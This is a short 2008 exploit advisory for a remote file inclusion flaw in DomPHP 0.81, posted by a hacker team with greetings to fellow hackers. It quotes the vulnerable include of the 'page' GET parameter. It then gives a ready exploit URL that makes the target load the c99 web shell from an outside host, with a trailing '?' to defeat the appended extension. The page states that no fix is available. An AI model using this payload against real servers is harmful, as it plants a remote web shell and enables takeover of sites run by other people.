DomPHP 0.81 (index.php page) Remote File Inclusion Vulnerability

2008-01-10 00:00:00

#########################################################################
DomPHP v0.81 Remote File Inclusion Vulnerability
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350 )
## HOME : http://no-hack.net

## Script : DomPHP
## Version : 0.81
## Site : http://www.domphp.com
## Download : http://www.domphp.com/download/cat.php?idcat=1

## Vulnerable CODE :
~~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
include($_GET['page'].".html");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


## EXPLOIT :
http://[HOST]/[Path]/aides/index.php?page=http://casavie.net/hack/c99.txt?



## GREETZ : CoNaN , RachiDox , DDOS , AND ALL MUSLIMS HACKERS

Visit : http://no-hack.net && http://tryag.cc/cc

#########################################################################
DomPHP v0.81 Remote File Inclusion Vulnerability
#########################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.